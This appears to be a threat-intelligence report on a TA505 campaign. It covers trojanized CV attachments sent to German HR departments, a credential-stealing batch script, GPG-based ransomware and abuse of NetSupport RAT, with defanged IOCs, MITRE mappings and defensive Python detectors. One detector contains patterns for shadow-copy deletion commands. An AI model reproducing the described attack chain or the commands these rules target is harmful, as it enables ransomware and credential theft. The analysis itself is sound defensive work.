75ae7bbdbfccde37a545a6b316e885e9a6d1ecf3c069fa48594a6db6f30c41d0
Javascript agent version 3.6
8c770d3424324030887fd6efcd7b989129f1430b8dafb482372240e93c009a24
951ca0adc511173018277b090a9eae3fb389092e095dbc4a0c9b67181dc43d1b
Javascript agent version 3.5
ba4ca5ae0aeb7916a6b08320830bb48c756f7ebaa281431e1311cb66dba3bca0
8100351010c260a7bdc2d283065097140418b5a33cf682f902e793ffaed263d4
Media.reg
9fee4514f8b3027ad045e67ee8d80317dd2afbf7a996c97f47c216ead011b070
MediaIE.reg
6cc5a6ce509a7bbbcaeab1f0635c8b14cbd6a5503cde799de3163fbf70221301

Actor created Folders
appData + \\Microsoft\\Credentials\\MediaPlayer\\MediaManager\\
appData + \\Microsoft\\Credentials\\MediaPlayer\\UtilitiesLog\\

C2 Retrieval URLs
hxxps://gitlab[.]com/bliblobla123/testingtesting/-/raw/master/README.md
hxxps://www.digitalpoint[.]com/members/bliblobla.943007/
hxxps://gitlab[.]com/jhondeer123/test/raw/master/README.md
hxxps://www.digitalpoint[.]com/members/johndeer123.923670/
hxxps://gitlab[.]com/jhondeer123/test/raw/master/test.py

Command and Control Node
hxxp://139.28.37[.]63
hxxp://185.62.190[.]89
hxxp://185.62.190[.]218

MITRE ATT&CK Framework Mapping
Tactic: Technique(s)
Initial Access: Spearphishing Link (T1192)
Execution: User Execution (T1204)
Persistence: Registry Run Keys / Startup Folder (T1060)
Defense Evasion: Timestomp (T1099), Indicator Removal on Host (T1070), Modify Registry (T1112), Hidden Window (T1143), Rundll32 (T1085)
Credential Access: Steal Web Session Cookie (T1539)
Collection: Data from Local System (T1005), Data Staged (T1074)
Command and Control: Commonly Used Port (T1043), Web Service (T1102), Remote File Copy (T1105)
Exfiltration: Exfiltration Over Command and Control Channel (T1041)


Thursday, March 19, 2020

The Curious Case of the Criminal Curriculum Vitae

 

Executive Summary

The Tailored Intelligence Team at Prevailion has detected a new campaign, at least a facet of which is currently active, dubbed The Curious Case of the Criminal Curriculum Vitae.

We associate this campaign with moderate confidence with the known cybercriminal organization TA505 (sometimes conflated with "Evil Corp"). One of the most infamous operations associated with this organization was the Necurs botnet, which was recently disrupted by Microsoft. That effort undoubtedly hampered TA505's operations, but in the grand scheme, criminal enterprises like these run multiple operations at any given time in order to continuously compromise victims across the globe.

In this newly discovered campaign from TA505, the threat actors targeted German companies with emails carrying trojanized attachments disguised as job applications. While this activity appeared to be geographically focused on Germany, the same techniques could easily be applied to any organization.

Once the email attachment was activated, a company's saved credentials and credit card data could be transmitted covertly to the threat actors. In the 2019 iterations of this attack, TA505 used publicly available tooling (GPG) to encrypt all of the user's files, which suggests this recent activity could also be laying the groundwork for encrypting files across the company's network.

In a second cluster of activity, TA505 used a more sophisticated approach. They fetched an instance of NetSupport, a commercial remote administration tool, hosted on a Google Drive account. This enabled a host of actions, including remote file transfer, screen capture, and even voice recording. Since these threat actors abuse legitimate binaries such as the GPG tools and NetSupport, the payloads are unlikely to be removed by traditional antivirus software.

Based upon the overlap in infrastructure between these two clusters, we associate these clusters of activity to the same threat actor with high confidence. Upon further inspection of the second cluster samples, we were able to correlate it to known TA505 activity based upon the digital signature used to sign the binary.

Technical Details

Cluster 1 Activity


Threat actors continue to rely on email lures to initially infect their victims. This technique is particularly hard to defend against when malicious emails mimic normal business interactions. In this case the threat actor impersonated an applicant seeking a job and attached a trojanized version of a Curriculum Vitae (CV). The sample below was sent to the human resources departments of German-speaking businesses. All observed source email addresses in this case were created through vodafonemail.de.

Image of the malicious email sent to victims in January 2020

The message above roughly translates to:

Dear Sir or Madam,
I am enclosing my CV in tabular form.
For any further questions I am gladly at your disposal.
Kind regards

Leon Jager

If the victim opens the CV file, lebensaluf_2020_1_7.iso, an embedded Microsoft shortcut (.lnk) file initiates and runs a PowerShell script on the newly infected host. The script begins by reaching out to a threat actor controlled IP address (hxxp://194.36.189[.]215/) to download two files: the first is a copy of rar.exe, and the second is a RAR archive named "dmnn.rar". The first file, rar.exe, is a legitimate binary used to compress and decompress data files; here it is used to decompress the second file, "dmnn.rar".

Once decompressed, the dmnn.rar file contained three files named:
      Lebenslauf_2020_1_7.jpeg
      Dmn.bat
      Sqlite3.exe

The aforementioned lnk file would first display the image file “lebenslauf_2020_1_7.jpeg”, likely in an attempt to avoid suspicion among the victims. 

Image of the Lebenslauf_2020_1_7.jpeg, as it would appear to victim

Next, the Microsoft LNK file starts "dmn.bat" using PowerShell. This dmn.bat is rather large, so to make it easier to understand we describe it in three parts. The first part changes the active console code page to "Multilingual (Latin I)" so the script runs regardless of the environment's configuration. This first segment then enumerates the host machine:
      Determine all the programs names installed on the machine,
      Version of the programs,
      Date the programs were installed,
      Determine the computer’s name,
      Determine the computer’s domain.

The script then proceeds to generate a string of eight random characters, likely as a unique identifier for each workstation. If the computer name and domain are not the same, it sends that information along with the unique identifier to the threat actor controlled C2 located at URI hxxp://194.36.189[.]215/firstga990.php 

The second part of the script attempts to gather saved credentials, cookies, and credit cards. Specifically, it:
      uses sqlite3.exe to obtain saved cookies, login data, and web data (such as credit card numbers) from Google Chrome,
      attempts to grab saved login passwords as well as cookies from the Thunderbird, Mozilla, and Edge applications,
      kills all taskhost and dllhost processes,
      enumerates and harvests Outlook credentials.

 
Image showing the process obtained saved information from Chrome browser

Once all the saved credentials are obtained, the output is written into the "safsff3f" directory. That directory is then compressed with rar and renamed to the aforementioned unique identifier. The newly compressed file is sent back to the threat actor controlled C2, specifically the URI "hxxp://194.36.189[.]215/ris.php".

Lastly, it creates a scheduled task with the same name as the unique identifier. The task runs every minute, transmitting the unique identifier back to the C2, likely as a heartbeat beacon. Finally, the bat file deletes all the files that were downloaded, created, and modified on the host machine. While this walkthrough covers the campaign that occurred on January 17th, 2020, we have observed these same techniques in use as far back as July 2019.
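A scheduled task that fires every minute and calls home with the same identifier is about the most regular traffic a host can generate, and regularity is the thing to hunt for when the URI and IP are not yet known. The script below is an added example for this article (not Prevailion's tooling or the actor's batch file) that groups proxy-log requests per client and destination and reports the pairs whose inter-request gaps cluster tightly around one period. The one-minute cadence and the C2 address come from the analysis above; the heartbeat path (/hb.php), the log format and every line in SAMPLE_LOG are constructed assumptions for the example.

```python
"""Find fixed-period heartbeats in proxy logs, such as a once-a-minute scheduled
task posting a host identifier back to its C2.

Added example for this article, not code from the original post or from the actor.
The log format, the /hb.php path and all SAMPLE_LOG lines are constructed; the
one-minute cadence and the C2 address 194.36.189.215 come from the analysis.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median
from urllib.parse import urlsplit

SAMPLE_LOG = """\
2020-01-17T10:00:00Z 10.0.0.7 GET http://194.36.189.215/hb.php?id=q8Kd2mZp 200
2020-01-17T10:00:05Z 10.0.0.7 GET https://www.example.com/index.html 200
2020-01-17T10:01:01Z 10.0.0.7 GET http://194.36.189.215/hb.php?id=q8Kd2mZp 200
2020-01-17T10:02:00Z 10.0.0.7 GET http://194.36.189.215/hb.php?id=q8Kd2mZp 200
2020-01-17T10:02:59Z 10.0.0.7 GET http://194.36.189.215/hb.php?id=q8Kd2mZp 200
2020-01-17T10:03:40Z 10.0.0.9 GET https://www.example.com/index.html 200
2020-01-17T10:04:01Z 10.0.0.7 GET http://194.36.189.215/hb.php?id=q8Kd2mZp 200
2020-01-17T10:05:00Z 10.0.0.7 GET http://194.36.189.215/hb.php?id=q8Kd2mZp 200
2020-01-17T10:06:02Z 10.0.0.7 GET http://194.36.189.215/hb.php?id=q8Kd2mZp 200
2020-01-17T10:07:00Z 10.0.0.7 GET http://194.36.189.215/hb.php?id=q8Kd2mZp 200
2020-01-17T10:13:12Z 10.0.0.7 GET https://www.example.com/about.html 200
""".splitlines()


def parse_line(line: str):
    """(timestamp, client, scheme://host/path); the query (the per-host id) is dropped
    so that every beacon from one host lands in the same series."""
    ts, client, _method, url, _status = line.split()[:5]
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    p = urlsplit(url)
    return when, client, f"{p.scheme}://{p.netloc}{p.path}"


def find_beacons(lines, min_hits=5, max_jitter=0.15, min_regular=0.8):
    """Return [(client, url, period_seconds, hits)] for (client, url) pairs with at
    least min_hits requests whose gaps mostly sit within max_jitter of the median."""
    series = defaultdict(list)
    for line in lines:
        when, client, url = parse_line(line)
        series[(client, url)].append(when)
    beacons = []
    for (client, url), times in series.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = median(gaps)
        if period <= 0:
            continue
        regular = sum(abs(g - period) <= max_jitter * period for g in gaps) / len(gaps)
        if regular >= min_regular:
            beacons.append((client, url, round(period), len(times)))
    return beacons


if __name__ == "__main__":
    for client, url, period, hits in find_beacons(SAMPLE_LOG):
        print(f"{client} -> {url} every ~{period}s ({hits} requests)")
```

The median rather than the mean is used as the period so that one missed or delayed beacon does not mask an otherwise rigid schedule, and the regularity threshold lets a few outliers through. On real logs the obvious extensions are a longer window, exclusion of known update and telemetry hosts, and treating a bare IP as the destination (as here) as an aggravating factor.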

GPG Ransomware: the June 2019 Strain

Once we analyzed the aforementioned samples, we discovered a similar rar file from June of 2019 that included a ransomware component. Like the previous operations, this one began with a file named “Lebenslauf_2019_6_6.iso” which contained an embedded Microsoft lnk file from June 2019. This Microsoft lnk file is almost identical to the one from January 2020.

Images showing the lexicon similarities between the iso files

The Microsoft LNK file again obtains both a RAR executable and a RAR archive. Once unpacked, this archive contained the following files:
      Brg.brg, which contains a 2048-bit RSA public key
      Brk.bat, a batch script that encrypts stored files
      Sh.vbs, a Visual Basic script that deletes all shadow copies as SYSTEM
      Lebensaluaf_2019_6_6, an image file
      Gpg.exe, the GPG executable
      Gpgconf.exe, support file for GPG tools
      Libassuan-0.dll, support file for GPG tools
      Libgcrypt-20.dll, support file for GPG tools
      Libgpg-error-0.dll, support file for GPG tools
      Libnpth-0.dll, support file for GPG tools
      Libsqlite3-0.dll, support file for GPG tools
      Zlib1.dll, support file for GPG tools

The main difference between the 2020 example and this 2019 strain is the inclusion of the GPG suite files. The batch file encrypts all the drives on the local machine using the public GPG key "brg.brg". Next it compresses the files and sends some host-based data to the email address [email protected]

Image of the malicious batch file

It would then display the following message to the victim, please note this is a verbatim copy of the message:
 "ATTENTION!"
"All important files and information on this comuter (documents, databases, etc.) will be decrypted using a RSA cryptographic algorithm"
"Without special software decoding a single file with the help of the most powerful computers will take about a 20 years."
"contact an expert  on e-mail: [email protected] or [email protected]"

The visual basic script proceeds to delete the shadow copy of the files as “system,” using Windows Management Instrumentation. The files that were in the compressed folder are deleted, and following that a web request is sent to the URI "hxxp://185.106.120[.]31/ok"

During our investigation, we identified another folder with the ransomware strain whose file names indicate it dates from May 2019. This folder once again contained the GPG binaries and a public key used to encrypt all the local files. There were only a few small differences. The first is that the encryption routine was written in Visual Basic rather than as a batch file; in this sample, the batch file simply contained a short script to delete all the downloaded files. Despite the damage this compressed folder could cause, we noticed it had a relatively low detection rate.

Virustotal detection rate for compressed tog.rar file, containing GPG ransomware script

The second difference was the email addresses used to contact the threat actor: blklock{at}airmail.cc and hopionion123{at}protonmail.com. Anecdotally, we found a post on an ESET forum from a user in Germany who claimed to have been victimized by this threat actor; we correlated the events based on the same blklock{at}airmail.cc address appearing in the ransom message. While this first cluster of activity appeared to be geographically based in Germany, these same techniques could easily be applied to any organization looking to recruit new applicants.

Cluster 2 - “REKT” and NetSupport Remote Admin Tool

Overlap with a Remote Administration Tool

Once we identified the C2 nodes used to host the malicious RAR archives, we noticed that they also hosted executable files. In the February 2020 campaign, the threat actor used the C2 node 194.36.189[.]215 to host both the malicious RAR archive and an executable named rrr.zzz on the same day, according to VirusTotal.

VirusTotal screenshot with both the CV RAR archive and the new sample being hosted on the same date

Upon further examination, the C2 used in the January campaign, 185.244.150[.]143, also hosted a variant of the same executable, “fnb.111”. Based upon the infrastructure overlap in two separate cases, we assess with high confidence that the same threat actors who were responsible for the “Curriculum Vitae” attacks were associated with this new agent.

The Rekt Loader 

Luckily, one of the files, rrr.zzz, still had its debug strings, which aided our efforts to understand the agent. For example, we were able to extract the following PDB string:
            "C:\\Users\\Андрей\\Desktop\\readme\\proj\\tst - копия\\Debug\\rekt.pdb"

This led us to believe that the threat actors named this particular loader “rekt” (not to be confused with the ransomware REKTlocker). The sample was written in C and C++ in Visual Studio 2017. The primary purpose of this loader was to download additional payloads. The sample contacted three unique URLs, all of which were hosted on Google Drive. It used a hard-coded user agent string in order to contact Google Drive:
            Mozilla / 5.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)

2nd Stage - NetSupport

Once the rekt loader contacted the three Google Drive URLs, it downloaded the following files:
      7zip.exe, a benign program used to compress/decompress files
      A batch file
      A password-protected 7zip archive

The rekt loader would then run the batch file, which used the 7zip executable to decompress the archive, supplying the requisite password. Once decompressed, the files were placed in the “%APPDATA%” directory. Afterward, it would add a “Run” registry key for persistence to start “host.exe”; the key modified was HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.
Next, it would start the downloaded host.exe file and, following completion, kill the rundll32.exe processes, change the %TEMP% directory and finally delete the batch file and the 7zip executable.

Image of the batch file hosted on Google Drive
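As an added example (not code from the report, nor from the actors' tooling), the following Python triage routine runs behaviour rules over constructed, simplified endpoint events for the two chains described above: the Visual Basic script's shadow-copy deletion through WMI, and the rekt batch-file sequence (password-protected 7zip extraction into %APPDATA%, a Run key pointing at host.exe, and the rundll32.exe kill). The event schema, rule names and sample lines are assumptions, not telemetry from the report.

```python
import re

# Constructed endpoint events in a simplified "event|process|details" schema;
# these are illustrative lines, not telemetry from the report.
SAMPLE_EVENTS = [
    "ProcessCreate|wscript.exe|C:\\Users\\u\\Downloads\\cv\\Trkop.vbs",
    "WmiActivity|wscript.exe|Win32_ShadowCopy Delete",
    "ProcessCreate|7zip.exe|7zip.exe x -pPlaceholderPw pkg.7z -oC:\\Users\\u\\AppData\\Roaming",
    "RegistrySet|cmd.exe|HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\h = "
    "C:\\Users\\u\\AppData\\Roaming\\host.exe",
    "ProcessCreate|host.exe|C:\\Users\\u\\AppData\\Roaming\\host.exe",
    "ProcessCreate|taskkill.exe|taskkill /F /IM rundll32.exe",
    "ProcessCreate|notepad.exe|notepad.exe C:\\Users\\u\\notes.txt",
]

# Each rule: (name, event type it applies to, regex over "process details").
# Two rules share a name where different telemetry exposes the same act.
RULES = [
    ("shadow_copy_delete", "WmiActivity",
     re.compile(r"Win32_ShadowCopy.*Delete", re.I)),
    ("shadow_copy_delete", "ProcessCreate",
     re.compile(r"vssadmin.*delete shadows|wmic.*shadowcopy.*delete", re.I)),
    ("password_7z_extract_to_appdata", "ProcessCreate",
     re.compile(r"7z.*\s-p\S+.*AppData", re.I)),
    ("run_key_points_to_appdata", "RegistrySet",
     re.compile(r"\\CurrentVersion\\Run\\.*=.*AppData\\.*\.exe", re.I)),
    ("rundll32_killed", "ProcessCreate",
     re.compile(r"taskkill.*rundll32", re.I)),
]

def parse_event(line):
    """Split one "event|process|details" line into its three fields."""
    event, process, details = line.split("|", 2)
    return event, process, details

def match_rules(lines):
    """Return (rule_name, line) for every rule that fires on a line."""
    hits = []
    for line in lines:
        event, process, details = parse_event(line)
        haystack = f"{process} {details}"
        for name, event_type, pattern in RULES:
            if event_type == event and pattern.search(haystack):
                hits.append((name, line))
    return hits

def triage(lines, threshold=2):
    """Collect distinct behaviours; flag the host once `threshold` of them
    co-occur, since any single one alone also has benign explanations."""
    names = sorted({name for name, _ in match_rules(lines)})
    return {"rules": names, "suspicious": len(names) >= threshold}
```

Running `triage(SAMPLE_EVENTS)` on the constructed lines fires four distinct rules and flags the host, while the lone notepad line on its own does not.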

The host.exe file was identified as NetSupport, a commercially available product that offers remote desktop software to customers. Since this is a commercially available product, it was a signed Windows binary, making it unlikely to be flagged by antivirus products. While this tool, and those like it, are intended for use by authorized administrators and information technology staff, they can also be abused by nefarious actors. Once this tool is deployed it provides the following capabilities:
      Remotely transferring files
      Geo-location of the infected machine
      Taking screenshots
      Remotely turning on the microphone to capture audio

The only file that appeared to be modified by the threat actor was client32.ini, where the threat actors entered their own gateway address, hxxp://23.227.207[.]138:12233.
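The client32.ini modification above is the one configuration artifact a defender can audit directly. The following Python check, added here as an example and not code from the report, parses a constructed client32.ini, pulls the gateway entries and flags any whose host is not on the organisation's allow-list. The [HTTP] section and its GatewayAddress/SecondaryGateway keys are assumed from NetSupport's configuration layout (the page does not show them), and 198.51.100.10 is a placeholder address.

```python
import configparser
from urllib.parse import urlsplit

# Constructed client32.ini fragment (not the sample from the report). The
# [HTTP] GatewayAddress/SecondaryGateway keys are assumed from NetSupport's
# configuration layout; 198.51.100.10 is a documentation-range placeholder.
SAMPLE_INI = """
[Client]
silent=1

[HTTP]
GatewayAddress=198.51.100.10:12233
SecondaryGateway=gateway.example.internal:443
"""

GATEWAY_KEYS = ("gatewayaddress", "secondarygateway")  # configparser lower-cases keys

def parse_gateways(ini_text):
    """Return every non-empty gateway value from the [HTTP] section, in file order."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(ini_text)
    if not cp.has_section("HTTP"):
        return []
    return [value.strip() for key, value in cp.items("HTTP")
            if key in GATEWAY_KEYS and value.strip()]

def host_of(address):
    """Split 'host:port' or 'scheme://host:port' into (host, port)."""
    if "://" not in address:
        address = "//" + address      # let urlsplit treat it as a netloc
    parts = urlsplit(address)
    return parts.hostname, parts.port

def audit_gateways(ini_text, allowed_hosts):
    """Flag any configured gateway whose host is not on the allow-list."""
    findings = []
    for gateway in parse_gateways(ini_text):
        host, port = host_of(gateway)
        if host not in allowed_hosts:
            findings.append({"gateway": gateway, "host": host, "port": port})
    return findings
```

With only gateway.example.internal on the allow-list, the placeholder primary gateway is reported as a finding with its port, which is the check to run across every NetSupport client on the estate after an incident like this one.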

Correlations to Prior Reporting

Once we identified the Rekt loader, we began to look for other variants of this sample. We identified an older variant from 2019, although we suspect there are additional samples. The sample from April 2019 was hosted on a compromised domain, hxxp://juristlex[.]com/photo/photo88326635[.]scr. Our evaluation showed that it appeared to be very similar to the agent from 2020.

One big difference was that this particular sample was signed with a digital signature from “Allo’ Ltd”. The company named “Allo’ Ltd” appeared to be a convenience store, or bodega, in the United Kingdom that closed in 2018. Searching on the properties of that digital signature, we identified two FlawedAmmyy trojans. The digital signature used to sign those two FlawedAmmyy trojans was referenced in a report on TA505 activity released earlier this year by South Korea's FSI-CERT. Both the FlawedAmmyy signature and the one used on the 2019 rekt sample referenced the same company and the same address, and expired on the same day at the same time. All three hashes and the digital signature serial number can be found below in the IOC section. We assess it is highly unlikely that another actor would impersonate the same organization to obtain digital signatures for binaries; therefore we correlate the Rekt agent, and the C2 nodes used to host it, to TA505 with moderate confidence.

Digital signature for the 2019 Rekt sample on the left, FlawedAmmyy sample on the right

Operation overview showing overlap between campaigns

When we analyzed the TTPs associated with this second cluster of activity, we observed similarities to reports by both Palo Alto and FireEye. The strongest correlation was with the Palo Alto report, where they observed the NetSupport RAT being deployed and then communicating with a hard-coded IP address ending in “/fakeurl.htm”. The one difference was that they observed NetSupport being downloaded by a PowerSploit module, whereas we observed it being downloaded by the rekt loader. There were also some similarities between this campaign and a FireEye report, where they observed a threat actor using a benign version of 7zip and a batch file that contained a password to decompress a folder containing NetSupport. In the FireEye report, the victims were compromised by visiting watering-hole websites.

Conclusion

The threat actor group known as TA505 has been active since at least 2017 and has continued to be prolific through the first quarter of 2020. This entity has achieved a high level of success due to its ability to abuse legitimate binaries for nefarious purposes. Two examples of this are the use of GPG tools to encrypt all the files on a machine, and the use of a legitimate remote systems administration tool that already has all the functionality they need while reducing the risk of detection. Since the binary was signed, even if it was detected by an antivirus engine, it has great potential to be mistakenly ignored as software that was intentionally installed by the network administrator.

In order to protect against TA505 and BEC in general, we recommend using an email security solution. End users should regularly update their antivirus product of choice, particularly high-risk users who open files from untrusted sources. In order to protect a corporate environment against ransomware attacks, the corporate network should be segmented to impede attackers' ability to spread laterally once they gain access. Strong passwords should be used for all corporate accounts, along with a password manager.

Prevailion has shared our findings, including file samples and indicators of compromise, in this report with Cyber Threat Alliance members. The CTA uses this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit www.cyberthreatalliance.org.

Indicators of Compromise 
